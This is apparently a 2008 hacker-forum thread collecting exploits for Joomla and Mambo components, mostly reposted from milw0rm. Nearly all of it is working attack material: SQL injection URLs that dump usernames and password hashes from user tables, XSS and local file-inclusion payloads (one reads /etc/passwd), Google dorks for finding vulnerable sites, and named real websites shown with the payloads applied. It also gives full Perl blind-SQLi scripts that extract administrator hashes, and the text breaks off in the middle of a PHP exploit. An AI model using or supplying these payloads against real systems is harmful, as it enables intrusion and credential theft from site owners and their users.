EXPLOIT:index.php?option=com_awesom&Itemid=S@BUN&task=viewlist&listid=-1/**/union/**/select/**/null,concat(username,0x3a,password),null,null,null ,null,null,null,null/**/from/**/mos_users/*
<name>Awesom</name>
<creationDate>24/05/2004</creationDate>
<author>Madd0</author>
<copyright>This component is released under the GNU/GPL License</copyright>
<authorEmail>madd0@users.sourceforge.net</authorEmail>
<authorUrl>amazoop.sourceforge.net</authorUrl>
<version>0.3.2</version>
<description>Awesom!, or Amazon Web Services for Opensource Mambo, is a component that lets you create lists of products to feature on your Mambo-driven site.<br />
These lists can be customized or can be automatically generated with information provided by Amazon through Amazon Web Services.<br />
Additionally, if you are an Amazon associate, you can configure Awesom to link to Amazon
using your associate ID in order to earn comissions.
</description>
milw0rm (http://milw0rm.com/exploits/5058)
joomla SQL Injection(com_shambo2)
DORKS 1: allinurl :"com_shambo2"
EXPLOIT:index.php?option=com_shambo2&Itemid=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cconcat(username,0x3a,password)%2C0%2C0% 2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2F %2A%2A%2Ffrom%2F%2A%2A%2Fmos_users
milw0rm (http://milw0rm.com/exploits/5059)
joomla SQL Injection(com_downloads)(filecatid)
DORKS 1: allinurl :"com_downloads"filecatid
EXPLOIT:index.php?option=com_downloads&Itemid=S@BUN&func=selectfolder&filecatid=-1/**/union/**/select/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from/**/mos_users/*
milw0rm (http://milw0rm.com/exploits/5073)
Joomla Component Ynews 1.0.0
The vulnerability allows a remote user to execute arbitrary SQL commands in the application's database. The vulnerability exists due to insufficient sanitisation of input data in the "id" parameter by the index.php script. A remote user can execute arbitrary SQL commands in the application's database with a specially crafted request.
Example: /index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1/* */union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*
xakep.ru (http://www.xakep.ru/post/42242/default.asp)
Component Ynews 1.0.0 SQL Injection Vulnerability
inurl: index.php?option=com_ynews
Injection: index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password ),null,5,6+from+jos_users/*
http://www.newpowersoul.de/index.php?option=com_ynews&Itemid=0&task=showYNews&id=-1+union+select+0,1,2,concat(username,0x3a,password ),null,5,6+from+jos_users/*
(c) milw0rm.com
Component PeopleBook 1.1.6 Passive XSS
inurl: index.php?option=com_peoplebook
Injection: /index.php?option=com_peoplebook&Itemid=661&func=searchstaff&Itemid=661&field=name&term=%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E&submit=Go&search_status=%25&search_category=%25
http://www.fln.org/index.php?option=com_peoplebook&Itemid=661&func=searchstaff&Itemid=661&field=name&term=%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E&submit=Go&search_status=%25&search_category=%25
Note: the XSS only works if search is enabled in the component.
(c) it's my
Added 08.02.2008
----------------------
Not sure what this one is, but it is definitely an active XSS
http://www.pan-group.com/mambo4.6/index.php?option=com_guest&option=com_guest&task=show&pageid=1
Another passive XSS, in the Quote component:
http://www.hlconveyancing.com/index.php?option=com_quote&task=instructUs&Itemid=49
enter "><script>alert(document.coockie)</script> into all the fields
Component com_noticias 1.0 SQL Injection
inurl: index.php?option=com_noticias
Injection: index.php?option=com_noticias&Itemid=999999&task=detalhe&id=-1+union+select+0,null,concat(username,0x3a,passwor d),3,4,5+from+jos_users/*
http://www.cm-stirso.pt/index.php?option=com_noticias&Itemid=999999&task=detalhe&id=-1+union+select+0,null,concat(username,0x3a,passwor d),3,4,5+from+jos_users/*
(c) zone-turk.net
SQL Injection
Mambo Component com_gallery Remote SQL Injection Vulnerability
EXPLOIT 1 :
index.php?option=com_gallery&Itemid=0&func=detail&id=-99999/**/union/**/select/**/0,0,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,use rname/**/from/**/mos_users/*
EXPLOIT 2 :
index.php?option=com_gallery&Itemid=0&func=detail&id=-999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A %2F0%2C1%2Cpassword%2C0%2C0%2C0%2C0%2C0%2C0%2C0%2C 0%2C0%2C0%2Cusername%2F%2A%2A%2Ffrom%2F%2A%2A%2Fmo s_users
SQL Injection
Joomla Component NeoGallery 1.1 SQL Injection Vulnerability
EXPLOIT :
index.php?option=com_neogallery&task=show&Itemid=5&catid=999999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3 a,password),concat(username,0x3a,password)/**/from%2F%2A%2A%2Fjos_users
milw0rm.com
CaNNabi$
10.02.2008, 14:44
Mambo SQL Injection (com_comments)
index.php?option=com_comments&task=view&id=-1+UNION+SELECT+0,999999,concat(username,0x3a,PASSW ORD),0,0,0,0,0,0+FROM+mos_users+union+select+*+fro m+mos_content_comments+where+1=1
http://www.milw0rm.com (http://www.milw0rm.com/exploits/5094)
Solide Snake
12.02.2008, 22:59
Joomla Component rapidrecipe <= 1.6.5 SQL Injection
SQL Injection
after user_id or catogry_id add exploit
-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
For searching:
allinurl: "com_rapidrecipe"user_id
allinurl: "com_rapidrecipe" category_id
Joomla Component pcchess <= 0.8 Remote SQL Injection
SQL Injection
index.php?option=com_pcchess&Itemid=S@BUN&page=players&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
For searching:
allinurl: com_pcchess "user_id"
allinurl: com_pcchess
(c) (http://www.hackturkiye.com)
Found this myself and checked it; it does not seem to be old news
Limbo - Lite Mambo 1.0.4
SQL injection in the downloads module, in the catid parameter; the tech support sites themselves are vulnerable:
http://limbo-cms.com.ru/index.php?option=downloads&catid=2700+union+select+1,concat_ws(0x3a,username, password),3+from+lc_users+--+
http://limboportal.com/index.php?option=downloads&catid=7%20and%20substring(version(),1,1)=3+--+
Component Blog Calendar 1.2.4 Passiv XSS
inurl: index.php?option=com_blog_calendar
Injection: index.php?option=com_blog_calendar&year=%22onmouseover=%22avascript:alert(document.co ockie);%22%3E123%3C!--
http://courier.brestnet.com/index.php?option=com_blog_calendar&year=%22onmouseover=%22avascript:alert(document.co ockie);%22%3E123%3C!--
For the alert to pop up, hover the cursor over the buggy link.
Component Board [version unknown] Local Include
inurl: index.php?option=com_board
Injection: index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=
http://eng.pharmaceutical.co.kr/index.php?option=com_board&bbs_id=notice&Itemid=99999999&requiredfile=../../../../../../../../../../../../etc/passwd
As for the Board component, I am not sure I named the vulnerability correctly, but it works like a charm =)
(c) it's my
Joomla Component xfaq 1.2 (aid) Remote SQL Injection Vulnerability
index.php?option=com_xfaq&task=answer&Itemid=S@BUN&catid=97&aid=-9988%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),0x3a,password,0x3a, username,0,0,0,0,1,1,1,1,1,1,1,1,0,0,0/**/from/**/jos_users/*
(c)milw0rm.com
Solide Snake
14.02.2008, 23:23
Joomla Component paxxgallery 0.2 (iid) SQL Injection
Exploit
AFTER userid ADD EXPLOIT (add the exploit after userid)
EXAMPLE=http:XXXXXX/index.php?option=com_paxxgallery&Itemid=85&gid=7&userid= EXPLOIT
EXPLOIT==
S@BUN&task=view&iid=-3333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2 F0%2C1%2C2%2C3%2Cconcat(username,0x3a,password)%2F %2A%2A%2Ffrom%2F%2A%2A%2Fjos_users
For searching
allinurl: com_paxxgallery "iid"
allinurl: com_paxxgallery "userid"
Joomla Component MCQuiz 0.9 Final (tid) SQL Injection
Exploit
ATTACKER CAN SEE PASSWORD AND USERNAME UNDER PAGE
EXAMPLE=www.xxxxx.com/index.php?option=com_mcquiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOIT]
EXPLOIT=1=
1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(username,0x3a,password),concat(username,0x3 a,password),0x3a/**/from/**/jos_users/*
EXPLOIT=2=
1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password)/**/from/**/mos_users/*
For searching
allinurl: com_mcquiz "tid"
allinurl: com_mcquiz
Joomla Component Quiz <= 0.81 (tid) SQL Injection
Exploit
ALL PASSWORD AND USERNAME UNDER PAGE
EXAMPLE: AFTER tid add EXPLOITS
www.xxxxxxxx.com/index.php?option=com_quiz&task=user_tst_shw&Itemid=xxx&tid= [EXPLOIT]
EXPLOIT=1=
1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password)/**/from/**/jos_users/*
EXPLOIT=2=
1/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password)/**/from/**/mos_users/*
For searching
allinurl: com_quiz"tid"
allinurl: com_quiz
(c) (http://www.hackturkiye.com)
Joomla Component mediaslide (albumnum) Blind SQL Injection
#!/usr/bin/perl
#inphex
#joomla com_mediaslide blind sql injection
use LWP::UserAgent;
use LWP::Simple;
use Switch;
use Digest::MD5 qw(md5 md5_hex md5_base64);
print "usage: $0 -h host.com -p /\n";
### use Getopt::Long; ###
$column = "username";
$table = "jos_users";
$regex = "preview_f2";
%cm_n_ = ("-h" => "host","-p" => "path","-c" => "column","-t" => "table","-r" => "regex");
$a = 0;
foreach (@ARGV) {
$a++;
while (($k, $v) = each(%cm_n_)) {
if ($_ eq $k) {
${$v} = $ARGV[$a];
}
}
}
$i = 48;
$h = 1;
$f = 0;
$k = 0;
### Yeah,that's it... ###
while () {
while ($i <= 90) {
if(check($i,$h,1) == 1)
{
syswrite STDOUT,lc(chr($i));
$h++;
$a_chr = $a_chr.chr($i);
}
$i++;
}
push(@ffs,length($a_chr));
if (($#ffs -1) == $ffs) {
&check_vuln();
exit;
}
$i = 48;
}
#/
### :D ###
sub check($$$)
{
$i = shift;
$h = shift;
$m = shift;
switch ($m)
{
case 1 { $query = "%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),".$h.",1)=CHAR(".$i.")"; }
}
$ua = LWP::UserAgent->new;
$url = "http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1".$query."";
$response = $ua->get($url);
$content = $response->content;
if($content =~ /$regex/) { return 0;} else { return 1 ;}
}
#/
sub check_vuln
{
$content = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=1");
$content1 = get("http://".$host.$path."index.php?option=com_mediaslide&act=contact&id=1&albumnum=1%20AND%201=0");
foreach $bb1 (split(/\n/,$content)) {
$bb = $bb.$bb1;
}
foreach $yy1 (split(/\n/,$content1)) {
$yy = $yy.$yy1;
}
$f = md5_hex($bb);
$s = md5_hex($yy);
if ($f eq $s) {
print "\nprobably not vulnerable"; #could be that ads,texts etc.. change
exit;
} else { print "\nvulnerable..."; }
}
# milw0rm.com [2008-02-14]
Mambo Component Quran <= 1.1 (surano) SQL Injection Vulnerability
Mambo
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+mos_users+limit+0,20--
Joomla
/index.php?option=com_quran&action=viewayat&surano=-1+union+all+select+1,concat(username,0x3a,password ),3,4,5+from+jos_users+limit+0,20--
allinurl:"com_quran"
inurl:"/index.php?option=com_quran"
(c)milw0rm.com
Mambo Component Ricette 1.0 Remote SQL Injection Vulnerability
EXPLOIT
index.php?option=com_ricette&Itemid=S@BUN&func=detail&id=-9999999/**/union/**/select/**/0,0,%20%20%200x3a,111,222,333,0,0,0,0,0,1,1,1,1,1, 1,1,1,1,0,0,concat(username,0x3a,password)/**/from/**/mos_users/
PS
allinurl: com_ricette
allinurl: "com_ricette"id
Auth S@BUN http://milw0rm.com/exploits/5133
joomla SQL Injection(com_jooget)
EXPLOIT :
index.php?option=com_jooget&Itemid=S@BUN&task=detail&id=-1/**/union/**/select/**/0,333,0x3a,333,222,222,222,111,111,111,0,0,0,0,0,0 ,0,0,1,1,2,2,concat(username,0x3a,password)/**/from/**/jos_users/*
PS
allinurl: id "com_jooget"
allinurl: detail "com_jooget"
allinurl: "com_jooget"
Auth S@BUN http://milw0rm.com/exploits/5132
Component Portfolio 1.0 SQL Injection
inurl: index.php?option=com_portfolio
Injection: index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
http://www.inta.org/index.php?option=com_portfolio&memberId=9&categoryId=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9,10,11,12+from+mos_users/*
(с) it's my http://milw0rm.com/exploits/5139
Joomla Component Artist
http://www.tremplin-avenir.com/index.php?option=com_artist&task=view_artist_file&artistId=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0 x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.dymok.net/index.php?option=com_artist&task=show_artist&id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(username,0 x3a,password),11,12,13,14,15,16+from+jos_users/*
http://www.aarte.net/index.php?option=com_artist&idgalery=-1+union+select+1,2,3,concat(username,0x3a,password ),5,6,7,8,9+from+jos_users/*
Three different vulnerable parameters
Solide Snake
19.02.2008, 18:29
Joomla Component com_pccookbook (user_id) SQL Injection
SQL Injection
index.php?option=com_pccookbook&page=viewuserrecipes&user_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
For searching
allinurl: com_pccookbook
allinurl: viewuserrecipes
allinurl: "com_pccookbook"user_id
Joomla Component com_clasifier (cat_id) SQL Injection
SQL Injection
index.php?option=com_clasifier&Itemid=S@BUN&cat_id=-9999999/**/union/**/select/**/concat(username,0x3a,password)/**/from/**/jos_users/*
For searching
allinurl: com_clasifier
allinurl: com_clasifier cat_id
(c) (http://www.hackturkiye.com/)
Component соm_рhilаfоrm
vulnerable parameter fоrm_id
but it does not work everywhere; I have not figured out why
example of a vulnerable site:
code:
httр://www.nехtрrоm.ru/index.рhр?орtiоn=соm_рhilаfоrm&Itеmid=5&fоrm_id=1+uniоn+sеlесt+1,2,version(),4,5,6,7, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30,31,32,33,34,35,36#&Itemid=5
Component EasyBook 1.1 Active XSS
inurl: index.php?option=com_easybook
Injection: when adding a message, the "Ваш сайт:/Your Homepage:" field is vulnerable. Enter: http://www.com/" onmouseover=javascript:alert(/XSS/);> and submit the message.
Example: http://demo.easy-joomla.org/index.php?option=com_easybook&Itemid=5
Nickname Hi!, hover the cursor over the link
Component Simpleboard 1.0.3 (catid) SQL Injection
inurl: index.php?option=com_simpleboard
Injection: index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0 x3a,password),5+from+mos_users/*
http://www.uvageneration.com/index.php?option=com_simpleboard&func=view&catid=-999+union+select+2,2,3,concat(0x3a,0x3a,username,0 x3a,password),5+from+mos_users/*
(c) it's my, Scipio, xcedz http://milw0rm.com/exploits/5195
~!DoK_tOR!~
06.03.2008, 18:44
Mambo Component com_Musica (id) Remote SQL Injection Vulnerability
SQL Injection
index.php?option=com_musica&Itemid=172&tasko=viewo &task=view2&id=-4214/**/union+select/**/0,0,password,0,0,0,0,0,0,0,0,0,1,1,1,0,0,0,0,0+fro m%2F%2A%2A%2Fmos_users/*
milw0rm (http://milw0rm.com/)
~!DoK_tOR!~
10.03.2008, 20:24
Mambo Component eWriting 1.2.1 (cat) SQL Injection Vulnerability
SQL Injection
Joomla!
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+jos_users--
Mambo
/index.php?option=com_ewriting&Itemid=9999&func=selectcat&cat=-1+UNION+ALL+SELECT+1,2,concat(username,0x3a,passwo rd),4,5,6,7,8,9,10+FROM+mos_users--
milw0rm (milw0rm.com)
~!DoK_tOR!~
11.03.2008, 19:26
Joomla Component ProductShowcase <= 1.5 SQL Injection Vulnerability
SQL Injection
index.php?option=com_productshowcase&Itemid=S@BUN&action=details&id=-99999/**/union/**/select/**/0,concat(username,0x3a,password),concat(username,0 x3a,password),0,0,0,0,0,1,1,1,1,2,3,4,5/**/from/**/jos_users/*
milw0rm (milw0rm.com)
Joomla 1.5.1
Active XSS
Edit Your Details -> Your Name: [XSS]
XSS
(Administrator rights)
Active:
Article: [ New ] -> Title: [XSS]
Passive:
Filter:[XSS]
/administrator/index.php?option=com_menus&task=view&menutype=[XSS]
ZAMUT (c)
Joomla components com_guide "category" Remote SQL Injection
PoC:
index.php?option=com_guide&category=-999999/**/union/**/select/**/0,username,
password,3,4,5,6,7,8/**/from/**/jos_users/*
© The-0utl4w
~!DoK_tOR!~
20.03.2008, 21:41
Joomla Component Datsogallery 1.3.1 Remote SQL Injection Vulnerability
SQL Injection
index.php?option=com_datsogallery&func=detail&id='Sql
union+select+1,2,3,4,concat_ws(0x3a,id,username,pa ssword),6,7,8,9,0,1,2,3,4,5+from+jos_users/*
milw0rm (http://milw0rm.com)
~!DoK_tOR!~
28.03.2008, 16:05
Joomla Component MyAlbum 1.0 (album) SQL Injection Vulnerability
SQL Injection
http://[target]/index.php?option=com_myalbum&album=[SQL]
-1+union+select+0,concat(username,char(32),password ),2,3,4%20from%20jos_users/*
Joomla Component alphacontent <= 2.5.8 (id) SQL Injection Vulnerability
SQL Injection
index.php?option=com_alphacontent§ion=6&cat=15&task=view&id=-999999/**/union/**/select/**/1,concat(username,0x3e,password),3,4,user(),user() ,user(),user(),user(),user(),user(),user(),user(), user(),user(),user(),user(),user(),user(),user(),u ser(),user(),user(),user(),user(),user(),user(),us er(),user(),user(),user(),user(),user(),user(),use r(),user(),user(),user(),39/**/from/**/jos_users/*
DORK:
inurl: "com_alphacontent"
"AlphaContent 2.5.8 © 2005-2008 - visualclinic.fr"
milw0rm (milw0rm.com)
Online FlashQuiz 1.0.2 Remote File Inclusion Vulnerability
Developer site : www.elearningforce.biz
Exploit : http://localhost/path/component/com_onlineflashquiz/quiz/common/db_config.inc.php?base_dir=[code]
(с) NoGe
Joomla passive XSS, Traxartist component
Vulnerability:
index.php?option=com_traxartist&task=playSongex&id=1">[xss]
Example:
http://www.xclusivetrax.com/index.php?option=com_traxartist&task=playSongex&id=1"><script>alert(document.coockie)</script>
found by it's my
Ded MustD!e
24.04.2008, 14:39
Joomla Component FlippingBook 1.0.4 SQL Injection
DORK: inurl:com_flippingbook
Exploit: /index.php?option=com_flippingbook&Itemid=28&book_id=null/**/union/**/select/**/null,concat(username,0x3e,password),null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null ,null,null,null,null,null,null,null,null,null,null/**/from/**/jos_users/*
(c)cO2
milw0rm.com (http://milw0rm.com)
Joomla Component Filiale v. 1.0.4 SQL Injection
DORK: inurl:com_filiale
Exploit: /index.php?option=com_filiale&idFiliale=-5+union+select+1,password,3,4,username,6,7,8,9,10, 11+from+jos_users
(c)Str0xo
milw0rm.com (http://milw0rm.com)
Joomla Component Profiler <= 1.0.1 Blind SQL Injection
DORK: allinurl:com_comprofiler
Exploit: /index.php?option=com_comprofiler&task=userProfile&user=1/**/and/**/mid((select/**/password/**/from/**/jos_users/**/limit/**/0,1),1,1)/**/</**/Char(97)/*
(c)$hur!k'n
milw0rm.com (http://milw0rm.com)
Joomla Component PaxxGallery Blind SQL Injection Exploit
"more than 1 row"
Vuln code:
.....
global $database;
$id = $_POST["id"];
$gid = $_POST["gid"];
if (isset($id)) {
.....
Exploit:
#!/usr/bin/perl
use strict;
use LWP::Simple;
print "-+--[ Joomla Component PaxxGallery Blind SQL Injection Exploit ]--+-\n";
print "-+-- \"more than 1 row\" --+-\n";
print "-+-- --+-\n";
print "-+-- Author: ZAMUT --+-\n";
print "-+-- Vuln: gid= --+-\n";
print "-+-- Dork: option=com_paxxgallery --+-\n";
# Example:
# Url_Part_1: http://www.morganomega.com/index.php?option=com_paxxgallery&Itemid=46&task=view&gid=7
# Url_Part_2: &iid=34
print "Url_Part_1:" ;
chomp(my $ur1=<STDIN>);
print "Url_Part_2:";
chomp(my $ur2=<STDIN>);
my $n=48;
my $i=1;
my $log= 1;
my ($content,$result) = undef;
my $request = 0;
while($log)
{
$content = get($ur1.'+and+1=(select+1+from+jos_users+where+le ngth(if(ascii(upper(substring((select+password+fro m+jos_users+where+id=62),'.$i.',1)))='.$n.',passwo rd,id))>4)/*'.$ur2);
if($content =~ /Subquery returns more than 1 row/) {$result.=chr($n); $n=47; $i++;}
elsif($i==33 || $content =~ /doesn\'t exist/) {$log = 0}
else {$n++; if($n==58){$n=65} }
$request++;
}
print "Administrator hash: ".$result."\n";
print "REQUEST: ".$request;
Dork: option=com_paxxgallery
ZAMUT (c)
~!DoK_tOR!~
02.05.2008, 17:10
Joomla Component Webhosting (catid) Blind SQL Injection Exploit
Exploit:
#!/usr/bin/perl
#eSploit Framework - Inphex
use Digest::MD5 qw(md5 md5_hex md5_base64);
use LWP::UserAgent;
use HTTP::Cookies;
use Switch;
$host_ = shift;
$path_ = shift;
$id_ = shift;
$non_find = shift; #choose anything thats inside the article of id
$column = "username"; #change if needet
$table = "jos_users"; #change if needet
$info{'info'} = {
"author" => ["cO2,Inphex"],
"name" => ["Joomla com_webhosting Blind SQL Injection"],
"version" => [],
"description" => ["This script will exploit a Blind SQL Injection Vulnerability in Joomla com_webhosting"],
"options" =>
{
"agent" => "",
"proxy" => "",
"default_headers" => [
["key","value"]],
"timeout" => 2,
"cookie" =>
{
"cookie" => ["key=value"],
},
},
"sending_options" =>
{
"host" => $host_,
"path" => $path_".index.php",
"port" => 80,
"method_a" => "SQL_INJECTION_BLIND",
"attack" =>
{
"option" => ["get","option","com_webhosting"],
"catid" => ["get","catid","".$id_."%20AND%20SUBSTRING((SELECT%20".$column."%20FROM%20".$table."%20LIMIT%200,1),\$h,1)=CHAR(\$i)"],
"regex" => [[$non_find]],
},
},
};
&start($info{'info'},222);
open FH,">>ok.html";
print FH $return{222}{'content'};
sub start
{
$a_ = shift;
$id = shift;
$get_dA = get_d_p_s("get");
$post_dA = get_d_p_s("post");
my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);
my $jj = 1;
my $ii = 48;
my $hh = 1;
my $ppp = 0;
my $s = shift;
my $a = "";
my $res_p = "";
my $h = "";
($h_host_h_xdsjaop,$h_path_h_xdsjaop,$h_port_h_xds jaop,$method_m) = ($a_->{'sending_options'}{'host'},$a_->{'sending_options'}{'path'},$a_->{'sending_options'}{'port'},$a_->{'sending_options'}{'method_a'});
$ua = LWP::UserAgent->new;
$ua->timeout($a_->{'options'}{'timeout'});
if ($a_->{'options'}{'proxy'}) {
$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});
}
$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";
$ua->agent($agent);
{
while (($k,$v) = each(%{$a_}))
{
if ($k ne "options" && $k ne "sending_options")
{
foreach $r (@{$a_->{$k}})
{
if ($a_->{$k}[0])
{
print $k.":".$a_->{$k}[0]."\n";
}
}
}
}
foreach $j (@{$a_->{'options'}{'default_headers'}})
{
$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);
$m++;
}
if ($a_->{'options'}{'cookie'}{'cookie'}[0])
{
$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);
}
}
switch ($method_m)
{
case "attack" { &attack();}
case "SQL_INJECTION_BLIND" { &sql_injection_blind();}
case "REMOTE_COMMAND_EXECUTION" { &attack();}
case "REMOTE_CODE_EXECUTION" {&attack();}
case "REMOTE_FILE_INCLUSION" { &attack();}
case "LOCAL_FILE_INCLUSION" { &attack(); }
else { &attack(); }
}
sub attack
{
if ($post_dA eq "") {
$method = "get";
} elsif ($post_dA ne "")
{
$method = "post";
}
if ($method eq "get") {
$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);
${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne "")
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
} elsif ($method eq "post")
{
$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);
${$a_}{$id}{'content'} = $res_p;
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;
while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])
{
if (${$jj} ne "")
{
${$a_}{$id}{'regex'}[$h] = ${$jj};
}
$jj++;
}
$h++;
}
}
}
sub sql_injection_blind
{
syswrite STDOUT,$column.":";
while ()
{
while ($ii <= 90)
{
if(check($ii,$hh) == 1)
{
syswrite STDOUT,lc(chr($ii));
$hh++;
$chr = $chr.chr($ii);
}
$ii++;
}
push(@ffs,length($chr));
if (($#ffs -1) == $ffs)
{
print "\nFinished/Error\n";
exit;
}
$ii = 48;
}
}
sub check($$)
{
$ii = shift;
$hh = shift;
if (get_d_p_s("post") ne "")
{
$method = "post";
} else { $method = "get";}
if ($method eq "get")
{
$ppp++;
$query = modify($get_dA,$ii,$hh);
$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
} elsif ($method eq "post")
{
$ppp++;
$query_g = modify($get_dA,$ii,$hh);
$query_p = modify($post_dA,$ii,$hh);
$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);
foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})
{
if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)
{
return 1;
}
else
{
return 0;
}
$h++;
}
}
}
sub modify($$$)
{
$string = shift;
$replace_by = shift;
$replace_by1 = shift;
if ($string !~/\$i/ && $string !~/\$h/) {
print $string;
} elsif ($string !~/\$i/)
{
$ff = substr($string,0,index($string,"\$h"));
$ee = substr($string,rindex($string,"\$h")+2);
$string = $ff.$replace_by1.$ee;
return $string;
} elsif ($string !~/\$h/)
{
$f = substr($string,0,index($string,"\$i"));
$e = substr($string,rindex($string,"\$i")+2);
$string = $f.$replace_by.$e;
return $string;
} else
{
$f = substr($string,0,index($string,"\$i"));
$e = substr($string,rindex($string,"\$i")+2);
$string = $f.$replace_by.$e;
$ff = substr($string,0,index($string,"\$h"));
$ee = substr($string,rindex($string,"\$h")+2);
$string = $ff.$replace_by1.$ee;
return $string;
}
}
sub get_d_p_s
{
$g_d_p_s = shift;
$post_data = "";
$get_data = "";
$header_data = "";
%header_dA = ();
while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))
{
if ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "get")
{
$method = "get"; push(@get,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "post")
{
$method = "post"; push(@post,$a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]);
}
elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")
{
$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];
}
$hp++;
}
$yy = $#get;
while ($bb <= $#get)
{
$get_data .= $get[$yy]."&";
$bb++;
$yy--;
}
$l = $#post;
while ($k <= $#post)
{
$post_data .= $post[$l]."&";
$k++;
$l--;
}
if ($g_d_p_s eq "get")
{
return $get_data;
}
elsif ($g_d_p_s eq "post")
{
return $post_data;
} elsif ($g_d_p_s eq "header")
{
return %header_dA;
}
}
sub get_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
%hash = get_d_p_s("header");
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = $ua->get($h_host_h_xdsjaop.$h_path_h_xdsjaop);
return $req->content;
}
sub post_data
{
$h_host_h_xdsjaop = shift;
$h_path_h_xdsjaop = shift;
$content_type = shift;
$send = shift;
%hash = get_d_p_s("header");
while (($u,$c) = each(%hash))
{
$ua->default_headers->push_header($u => $c);
}
$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.$h_path_h_xdsjaop);
$req->content_type($content_type);
$req->content($send);
$res = $ua->request($req);
return $res->content;
}
}
# milw0rm.com [2008-05-01]
milw0rm (milw0rm.com)
~!DoK_tOR!~
11.05.2008, 18:41
Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit
<?
//Joomla Component com_datsogallery 1.6 Blind SQL Injection Exploit by +toxa+
//Greets: all members of antichat.ru & cih.ms
//options
set_time_limit(0);
ignore_user_abort(1);
$norm_ua='Mozilla/5.0 (Windows; U; Windows NT 6.0; ru; rv:1.8.1.14) Gecko/20080404 Firefox/2.0.0.14';
$url=$_GET['url'];
